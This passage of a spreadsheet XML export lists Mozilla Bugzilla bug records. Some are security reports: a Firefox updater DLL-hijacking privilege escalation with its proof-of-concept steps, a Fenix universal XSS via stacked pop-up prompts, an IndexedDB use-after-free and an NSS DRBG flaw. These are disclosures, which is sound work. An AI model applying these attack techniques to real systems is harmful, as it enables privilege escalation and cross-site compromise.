        </is>
      </c>
      <c r="L5462" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5462" t="inlineStr">
        <is>
          <t>Windows 7</t>
        </is>
      </c>
      <c r="N5462" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5462" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5462" t="inlineStr">
        <is>
          <t>[qa+:ashughes][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q5462" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5462" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5462" t="inlineStr">
        <is>
          <t>mozilla15</t>
        </is>
      </c>
      <c r="T5462" t="n">
        <v>1</v>
      </c>
      <c r="U5462" t="n">
        <v>0</v>
      </c>
      <c r="V5462" t="n">
        <v>42</v>
      </c>
      <c r="W5462" t="inlineStr">
        <is>
          <t>Created attachment 620029
poc.zip
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0
Build ID: 20120420145725
Steps to reproduce:
The updater.exe from FF12 loads the wsock32.dll from the application directory during initialization, this is an issue when combined with the maintenance service as it would allow an attacker to privilege escalate to local system without any prompts. As it is the real updater.exe doing the loading it circumvents all the protections in place to ensure it is signed etc.
I have attached a poc which I have tested on win7 64bit with FF12. You need to extract the zip, run the FFServer.exe file with the path to your installation of FF12 on the command line. It should then start the maintenance service (which should be enabled) and it will run updater.exe. This then loads the fake wsock32.dll from the current directory and a localsystem copy of calc should appear in the process list. Wsock32.dll is just a simple dll which runs calc in DllMain. All it needed was to export oridinal 14 to ensure the loader loaded it.
Actual results:
A fake wsock32.dll is loaded from the updater directory which loads into the local system privileged version of updater.exe. At this point it is possible to do anything you like with elevated permissions.
Expected results:
It shouldn't be loading from the current directory (not that it has much choice).</t>
        </is>
      </c>
      <c r="X5462" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5463">
      <c r="A5463" t="n">
        <v>1245079</v>
      </c>
      <c r="B5463" t="inlineStr">
        <is>
          <t>2016-02-02 05:00:32 -0800</t>
        </is>
      </c>
      <c r="C5463" t="inlineStr">
        <is>
          <t>Heroku RDS instance has &lt;20GB storage remaining</t>
        </is>
      </c>
      <c r="D5463" t="inlineStr">
        <is>
          <t>2016-11-25 03:15:28 -0800</t>
        </is>
      </c>
      <c r="E5463" t="n">
        <v>1</v>
      </c>
      <c r="F5463" t="n">
        <v>1</v>
      </c>
      <c r="G5463" t="n">
        <v>7</v>
      </c>
      <c r="H5463" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I5463" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J5463" t="inlineStr">
        <is>
          <t>Treeherder: Infrastructure</t>
        </is>
      </c>
      <c r="K5463" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L5463" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5463" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5463" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5463" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5463" t="inlineStr"/>
      <c r="Q5463" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5463" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5463" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5463" t="n">
        <v>1</v>
      </c>
      <c r="U5463" t="n">
        <v>0</v>
      </c>
      <c r="V5463" t="n">
        <v>20</v>
      </c>
      <c r="W5463" t="inlineStr">
        <is>
          <t>I have a CloudWatch alert that has just triggered.
There's 20GB out of 100GB general storage remaining on the prototype Heroku RDS instance.
Current consumption is at ~3GB/week.
Execute:
&gt; SELECT ROUND(SUM((data_length+index_length)/power(1024,3)),2) size_gb, table_name
FROM information_schema.tables GROUP BY table_name
ORDER BY size_gb DESC LIMIT 10
+ ------------ + --------------- +
| size_gb      | table_name      |
+ ------------ + --------------- +
| 24.78        | job_artifact    |
| 15.06        | job             |
| 11.60        | failure_line    |
| 8.13         | performance_datum |
| 5.53         | job_log_url     |
| 0.16         | revision        |
| 0.05         | reference_data_signatures |
| 0.05         | revision_map    |
| 0.03         | result_set      |
| 0.02         | failure_match   |
+ ------------ + --------------- +
10 rows</t>
        </is>
      </c>
      <c r="X5463" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5464">
      <c r="A5464" t="n">
        <v>1879444</v>
      </c>
      <c r="B5464" t="inlineStr">
        <is>
          <t>2024-02-08 16:09:38 -0800</t>
        </is>
      </c>
      <c r="C5464" t="inlineStr">
        <is>
          <t>Potential UAFs caused by SafeRefPtr::operator=(SafeRefPtr &amp;&amp;)</t>
        </is>
      </c>
      <c r="D5464" t="inlineStr">
        <is>
          <t>2024-09-19 11:25:57 -0700</t>
        </is>
      </c>
      <c r="E5464" t="n">
        <v>1</v>
      </c>
      <c r="F5464" t="n">
        <v>1</v>
      </c>
      <c r="G5464" t="n">
        <v>3</v>
      </c>
      <c r="H5464" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5464" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5464" t="inlineStr">
        <is>
          <t>Storage: IndexedDB</t>
        </is>
      </c>
      <c r="K5464" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5464" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5464" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5464" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5464" t="inlineStr">
        <is>
          <t>[adv-main124+][adv-esr115.9+]</t>
        </is>
      </c>
      <c r="Q5464" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5464" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S5464" t="inlineStr">
        <is>
          <t>125 Branch</t>
        </is>
      </c>
      <c r="T5464" t="n">
        <v>1</v>
      </c>
      <c r="U5464" t="n">
        <v>0</v>
      </c>
      <c r="V5464" t="n">
        <v>25</v>
      </c>
      <c r="W5464" t="inlineStr">
        <is>
          <t>`SafeRefPtr::operator=(SafeRefPtr &amp;&amp;)` (`dom/indexedDB/SafeRefPtr.h`) doesn't check for self-assignment. If self-assignment occurs, the function spuriously decrements the reference count of its `mRawPtr` member, likely causing a UAF in other code that uses the object to which `mRawPtr` points.
There are several uses of this operator that might be unsafe, though many other usages are of the form `object = nullptr`, which is clearly safe. From `FIREFOX_122_0_RELEASE`:
```
221:   SafeRefPtr&amp; operator=(SafeRefPtr&amp;&amp; aOther) noexcept {
222:     assign_assuming_AddRef(aOther.mRawPtr);
223:     aOther.mRawPtr = nullptr;
224:     return *this;
225:   }
166:  void assign_assuming_AddRef(T* aNewPtr) {
167:     T* oldPtr = mRawPtr;
168:     mRawPtr = aNewPtr;
169:     if (oldPtr) {
170:       ConstRemovingRefPtrTraits&lt;T&gt;::Release(oldPtr);
171:     }
172:  }
```
The fix is trivial and low risk.</t>
        </is>
      </c>
      <c r="X5464" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5465">
      <c r="A5465" t="n">
        <v>925896</v>
      </c>
      <c r="B5465" t="inlineStr">
        <is>
          <t>2013-10-11 12:49:09 -0700</t>
        </is>
      </c>
      <c r="C5465" t="inlineStr">
        <is>
          <t>UAF in signaling_unittests</t>
        </is>
      </c>
      <c r="D5465" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:07 -0800</t>
        </is>
      </c>
      <c r="E5465" t="n">
        <v>1</v>
      </c>
      <c r="F5465" t="n">
        <v>1</v>
      </c>
      <c r="G5465" t="n">
        <v>3</v>
      </c>
      <c r="H5465" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5465" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5465" t="inlineStr">
        <is>
          <t>WebRTC: Signaling</t>
        </is>
      </c>
      <c r="K5465" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5465" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M5465" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5465" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5465" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5465" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+][adv-esr24.3+]</t>
        </is>
      </c>
      <c r="Q5465" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5465" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5465" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T5465" t="n">
        <v>1</v>
      </c>
      <c r="U5465" t="n">
        <v>0</v>
      </c>
      <c r="V5465" t="n">
        <v>18</v>
      </c>
      <c r="W5465" t="inlineStr">
        <is>
          <t>Created attachment 816042
asan-crash-stack.txt</t>
        </is>
      </c>
      <c r="X5465" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5466">
      <c r="A5466" t="n">
        <v>662215</v>
      </c>
      <c r="B5466" t="inlineStr">
        <is>
          <t>2011-06-05 19:42:18 -0700</t>
        </is>
      </c>
      <c r="C5466" t="inlineStr">
        <is>
          <t>"ASSERTION: not a file URL"</t>
        </is>
      </c>
      <c r="D5466" t="inlineStr">
        <is>
          <t>2011-11-09 15:16:57 -0800</t>
        </is>
      </c>
      <c r="E5466" t="n">
        <v>1</v>
      </c>
      <c r="F5466" t="n">
        <v>1</v>
      </c>
      <c r="G5466" t="n">
        <v>3</v>
      </c>
      <c r="H5466" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5466" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5466" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K5466" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5466" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M5466" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N5466" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5466" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5466" t="inlineStr">
        <is>
          <t>[sg:low][qa-]</t>
        </is>
      </c>
      <c r="Q5466" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5466" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5466" t="inlineStr">
        <is>
          <t>mozilla7</t>
        </is>
      </c>
      <c r="T5466" t="n">
        <v>1</v>
      </c>
      <c r="U5466" t="n">
        <v>0</v>
      </c>
      <c r="V5466" t="n">
        <v>40</v>
      </c>
      <c r="W5466" t="inlineStr">
        <is>
          <t>Created attachment 537489
testcase (triggers assertion if local)
###!!! ASSERTION: not a file URL: 'Error', file netwerk/base/src/nsStandardURL.cpp
Firefox seems to be quite confused about what kind of URL 
   d\nata:text/plain,2
is.  Some parts are treating it as a data: URL and others... aren't.</t>
        </is>
      </c>
      <c r="X5466" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5467">
      <c r="A5467" t="n">
        <v>1701684</v>
      </c>
      <c r="B5467" t="inlineStr">
        <is>
          <t>2021-03-29 07:51:43 -0700</t>
        </is>
      </c>
      <c r="C5467" t="inlineStr">
        <is>
          <t>Universal XSS with pop-up prompts</t>
        </is>
      </c>
      <c r="D5467" t="inlineStr">
        <is>
          <t>2022-11-03 23:26:16 -0700</t>
        </is>
      </c>
      <c r="E5467" t="n">
        <v>1</v>
      </c>
      <c r="F5467" t="n">
        <v>1</v>
      </c>
      <c r="G5467" t="n">
        <v>2</v>
      </c>
      <c r="H5467" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5467" t="inlineStr">
        <is>
          <t>Fenix</t>
        </is>
      </c>
      <c r="J5467" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5467" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5467" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5467" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N5467" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5467" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5467" t="inlineStr"/>
      <c r="Q5467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5467" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5467" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5467" t="n">
        <v>1</v>
      </c>
      <c r="U5467" t="n">
        <v>0</v>
      </c>
      <c r="V5467" t="n">
        <v>6</v>
      </c>
      <c r="W5467" t="inlineStr">
        <is>
          <t>Created attachment 9212210
Proof of concept page
Fenix allows pop-up prompts to stack when `window.open()` is called multiple times. This doesn’t seem to be properly considered in the code, on navigation only one such prompt is removed. So a page can produce two prompts and navigate elsewhere then, one prompt will remain. If the user happens to allow the pop-up, it will open with the new page as opener. If a `javascript:` URI is opened, the code will be able to gain full access to the “opener” page.
You can see the attached page do this: it produces two pop-up prompts, then redirects to Google. The prompt is a JavaScript URL with some trivial obfuscation – it appears to relate to `google.com` while the actual JavaScript code (`alert(opener.location.href)`) is URL-encoded. Accepting the prompt will then produce an alert message showing that it can indeed access the opening Google page.
This is particularly critical given bug 1701673 – a web page can produce a huge number of pop-up prompts, thus forcing the user to accept the pop-up in an attempt to unlock the UI.</t>
        </is>
      </c>
      <c r="X5467" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5468">
      <c r="A5468" t="n">
        <v>1653862</v>
      </c>
      <c r="B5468" t="inlineStr">
        <is>
          <t>2020-07-19 09:47:26 -0700</t>
        </is>
      </c>
      <c r="C5468" t="inlineStr">
        <is>
          <t>Firefox save gmail password into phone dicrtionarty</t>
        </is>
      </c>
      <c r="D5468" t="inlineStr">
        <is>
          <t>2020-12-18 17:20:35 -0800</t>
        </is>
      </c>
      <c r="E5468" t="n">
        <v>1</v>
      </c>
      <c r="F5468" t="n">
        <v>1</v>
      </c>
      <c r="G5468" t="n">
        <v>3</v>
      </c>
      <c r="H5468" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5468" t="inlineStr">
        <is>
          <t>GeckoView</t>
        </is>
      </c>
      <c r="J5468" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5468" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5468" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5468" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5468" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5468" t="inlineStr">
        <is>
          <t>[adv-main80+]</t>
        </is>
      </c>
      <c r="Q5468" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5468" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S5468" t="inlineStr">
        <is>
          <t>81 Branch</t>
        </is>
      </c>
      <c r="T5468" t="n">
        <v>1</v>
      </c>
      <c r="U5468" t="n">
        <v>0</v>
      </c>
      <c r="V5468" t="n">
        <v>33</v>
      </c>
      <c r="W5468" t="inlineStr">
        <is>
          <t>User Agent: Mozilla/5.0 (Android 8.0.0; Mobile; rv:79.0) Gecko/79.0 Firefox/79.0
Steps to reproduce:
Firefox version: 79.0.0-beta.9 Build #2015752523
Phone HW: Sony XPERIA XZ F8331
Android version: 8.0.0
Steps:
1. Open Gmail lagin page on Firefox Beta.
2. Enter login to Gmail (email)
3. Enter password to Gmail account
Actual results:
3.A. Entered password is shown above the virtual keyboard
3.B. Password was saved into Phone keyboard dictionary (it is available to see, ald it is proposed when writing On other pages/application)
IMPORTANT! 
This issue does not occur on Firefox 68.10.1 (release on Google Play), that is why I think it is problem with Firefox Beta  79.0.0-beta.9
Expected results:
3.A Password should not be displayed when it is entering
3.B Password should not be saved into Phone keyboard dictionary</t>
        </is>
      </c>
      <c r="X5468" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5469">
      <c r="A5469" t="n">
        <v>394500</v>
      </c>
      <c r="B5469" t="inlineStr">
        <is>
          <t>2007-08-31 15:03:02 -0700</t>
        </is>
      </c>
      <c r="C5469" t="inlineStr">
        <is>
          <t>FTP area keeps getting set to read-only?!?</t>
        </is>
      </c>
      <c r="D5469" t="inlineStr">
        <is>
          <t>2013-08-12 21:54:08 -0700</t>
        </is>
      </c>
      <c r="E5469" t="n">
        <v>1</v>
      </c>
      <c r="F5469" t="n">
        <v>1</v>
      </c>
      <c r="G5469" t="n">
        <v>5</v>
      </c>
      <c r="H5469" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5469" t="inlineStr">
        <is>
          <t>Release Engineering</t>
        </is>
      </c>
      <c r="J5469" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K5469" t="inlineStr">
        <is>
          <t>other</t>
        </is>
      </c>
      <c r="L5469" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5469" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5469" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5469" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5469" t="inlineStr"/>
      <c r="Q5469" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5469" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5469" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T5469" t="n">
        <v>1</v>
      </c>
      <c r="U5469" t="n">
        <v>0</v>
      </c>
      <c r="V5469" t="n">
        <v>25</v>
      </c>
      <c r="W5469" t="inlineStr">
        <is>
          <t>The FTP area keeps getting set to read-only. This has happened a few times now, so filing tracking bug.
Some examples are:
- (build) permissions on all ${os}_info.txt files were read-only user
- (updates) permissions on AUS config (snippets) and partial MARs were wrong
- (stage) permissions problems for non-stage-merged dirs; 
- - manually did 775 for dirs an 664 for files. group perms seem ok, and batch-skel/stage-merged ok as well. 
Maybe a bug in the rsync from the build machines? Maybe a bug in the initial staging FTP area setup? Or something else?</t>
        </is>
      </c>
      <c r="X5469" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5470">
      <c r="A5470" t="n">
        <v>353704</v>
      </c>
      <c r="B5470" t="inlineStr">
        <is>
          <t>2006-09-21 15:00:20 -0700</t>
        </is>
      </c>
      <c r="C5470" t="inlineStr">
        <is>
          <t>crash (not sure what I did, could have been on blogger.com) [@ js_SetProtoOrParent] [@ xpsp2res.dll] [@ 0x20202020]</t>
        </is>
      </c>
      <c r="D5470" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:44 -0700</t>
        </is>
      </c>
      <c r="E5470" t="n">
        <v>1</v>
      </c>
      <c r="F5470" t="n">
        <v>1</v>
      </c>
      <c r="G5470" t="n">
        <v>3</v>
      </c>
      <c r="H5470" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5470" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5470" t="inlineStr">
        <is>
          <t>XPConnect</t>
        </is>
      </c>
      <c r="K5470" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L5470" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5470" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5470" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O5470" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5470" t="inlineStr">
        <is>
          <t>[patch]</t>
        </is>
      </c>
      <c r="Q5470" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5470" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S5470" t="inlineStr">
        <is>
          <t>mozilla1.9alpha1</t>
        </is>
      </c>
      <c r="T5470" t="n">
        <v>1</v>
      </c>
      <c r="U5470" t="n">
        <v>0</v>
      </c>
      <c r="V5470" t="n">
        <v>30</v>
      </c>
      <c r="W5470" t="inlineStr">
        <is>
          <t>crash (not sure what I did, could have been on blogger.com) [@js_SetProtoOrParent]
this was on my mac, trunk, debug build from 20060921
I'll attach the crash report</t>
        </is>
      </c>
      <c r="X5470" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5471">
      <c r="A5471" t="n">
        <v>790799</v>
      </c>
      <c r="B5471" t="inlineStr">
        <is>
          <t>2012-09-12 16:11:23 -0700</t>
        </is>
      </c>
      <c r="C5471" t="inlineStr">
        <is>
          <t>Make subscriptions more salient</t>
        </is>
      </c>
      <c r="D5471" t="inlineStr">
        <is>
          <t>2012-10-15 11:25:08 -0700</t>
        </is>
      </c>
      <c r="E5471" t="n">
        <v>1</v>
      </c>
      <c r="F5471" t="n">
        <v>1</v>
      </c>
      <c r="G5471" t="n">
        <v>5</v>
      </c>
      <c r="H5471" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I5471" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J5471" t="inlineStr">
        <is>
          <t>Knowledge Base Software</t>
        </is>
      </c>
      <c r="K5471" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M5471" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N5471" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5471" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5471" t="inlineStr">
        <is>
          <t>u=contributor c=wiki p=1 s=2012.19</t>
        </is>
      </c>
      <c r="Q5471" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R5471" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5471" t="inlineStr">
        <is>
          <t>2012Q4</t>
        </is>
      </c>
      <c r="T5471" t="n">
        <v>1</v>
      </c>
      <c r="U5471" t="n">
        <v>0</v>
      </c>
      <c r="V5471" t="n">
        <v>6</v>
      </c>
      <c r="W5471" t="inlineStr">
        <is>
          <t>As  a localizer I would like to see more easily how to subscribe to the  locale notifications, since they can be overseen in the current UI
    https://sumo.etherpad.mozilla.org/92</t>
        </is>
      </c>
      <c r="X5471" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5472">
      <c r="A5472" t="n">
        <v>1197098</v>
      </c>
      <c r="B5472" t="inlineStr">
        <is>
          <t>2015-08-21 00:30:58 -0700</t>
        </is>
      </c>
      <c r="C5472" t="inlineStr">
        <is>
          <t>Sync is janky when processing incoming history entries due to work done for about:newtab</t>
        </is>
      </c>
      <c r="D5472" t="inlineStr">
        <is>
          <t>2015-08-25 07:40:11 -0700</t>
        </is>
      </c>
      <c r="E5472" t="n">
        <v>1</v>
      </c>
      <c r="F5472" t="n">
        <v>1</v>
      </c>
      <c r="G5472" t="n">
        <v>2</v>
      </c>
      <c r="H5472" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I5472" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J5472" t="inlineStr">
        <is>
          <t>Sync</t>
        </is>
      </c>
      <c r="K5472" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L5472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5472" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5472" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5472" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5472" t="inlineStr"/>
      <c r="Q5472" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R5472" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5472" t="inlineStr">
        <is>
          <t>Firefox 43</t>
        </is>
      </c>
      <c r="T5472" t="n">
        <v>1</v>
      </c>
      <c r="U5472" t="n">
        <v>0</v>
      </c>
      <c r="V5472" t="n">
        <v>8</v>
      </c>
      <c r="W5472" t="inlineStr">
        <is>
          <t>Sync causes significant UI jank when processing incoming history records, which I've tracked down to onFrecencyChanged() in NewTabUtils.jsm being called once per new record while Sync is adding up to 5000 records.
Sync calls Cc["@mozilla.org/browser/history;1"].getService(Ci.mozIAsyncHistory).updatePlaces() in batches of 50 items. While nsINavHistoryObserver has onBeginUpdateBatch and onEndUpdateBatch, this history implementation doesn't make use of it - mainly because almost noone seems to call this interface with multiple records at once - sync and profile migrators seem to be the exceptions.
I'm a little reluctant to change History.cpp to make this call if multiple items are being added. History.jsm doesn't implement its |update| method, and if it did implement it as described it wouldn't suit Sync's requirements (there's no callback for errors). So I took a "low road" approach of having Sync send these notification before and after it does its thing, and having NewTabUtils do the right thing on that notification.
These methods were added to NewTabUtils in bug 911307, which was implemented by Drew (hence r?) and reviewed by Tim (hence f?), and cc Mak as he knows everything about places :)
I've struggled to measure jank accurately, so I've just been observing it by having the Sync button in the toolbar and watching how smooth it is. The button spins very jankily without this patch and quite smoothly with it, and about:newtab looks correct after Sync completes. What do you think?</t>
        </is>
      </c>
      <c r="X5472" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="5473">
      <c r="A5473" t="n">
        <v>1345089</v>
      </c>
      <c r="B5473" t="inlineStr">
        <is>
          <t>2017-03-07 05:21:19 -0800</t>
        </is>
      </c>
      <c r="C5473" t="inlineStr">
        <is>
          <t>DRBG addition is broken</t>
        </is>
      </c>
      <c r="D5473" t="inlineStr">
        <is>
          <t>2017-10-26 19:13:02 -0700</t>
        </is>
      </c>
      <c r="E5473" t="n">
        <v>1</v>
      </c>
      <c r="F5473" t="n">
        <v>1</v>
      </c>
      <c r="G5473" t="n">
        <v>3</v>
      </c>
      <c r="H5473" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5473" t="inlineStr">
        <is>
          <t>NSS</t>
        </is>
      </c>
      <c r="J5473" t="inlineStr">
        <is>
          <t>Libraries</t>
        </is>
      </c>
      <c r="K5473" t="inlineStr">
        <is>
          <t>trunk</t>
        </is>
      </c>
      <c r="L5473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M5473" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N5473" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O5473" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P5473" t="inlineStr">
        <is>
          <t>[adv-main53+][adv-esr45.9+][adv-esr52.1+]</t>
        </is>
      </c>
      <c r="Q5473" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R5473" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S5473" t="inlineStr">
        <is>
          <t>3.30</t>
        </is>
      </c>
      <c r="T5473" t="n">
        <v>1</v>
      </c>
      <c r="U5473" t="n">
        <v>0</v>
      </c>
      <c r="V5473" t="n">
        <v>6</v>
      </c>
      <c r="W5473" t="inlineStr">
        <is>
          <t>Created attachment 8844427
analysis by Vladimir Klebanov
Addition in drbg.c for the internal state V doesn't correctly carry bits over.
This was independently discovered by Vladimir Klebanov (Karlsruher Institute of Technology) and myself.</t>
        </is>
      </c>
      <c r="X5473" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="5474">
      <c r="A5474" t="n">
        <v>26221</v>
      </c>
      <c r="B5474" t="inlineStr">
        <is>
          <t>2000-02-02 07:52:54 -0800</t>
        </is>
      </c>
      <c r="C5474" t="inlineStr">
        <is>
          <t>Form drop-down &amp; box on right-side of screen (zdnet.com)</t>
        </is>
      </c>
      <c r="D5474" t="inlineStr">
        <is>
          <t>2024-04-15 02:16:21 -0700</t>
        </is>
      </c>
      <c r="E5474" t="n">
        <v>1</v>
      </c>
      <c r="F5474" t="n">
        <v>1</v>
      </c>
      <c r="G5474" t="n">
        <v>3</v>
      </c>
      <c r="H5474" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I5474" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J5474" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K5474" t="inlineStr">
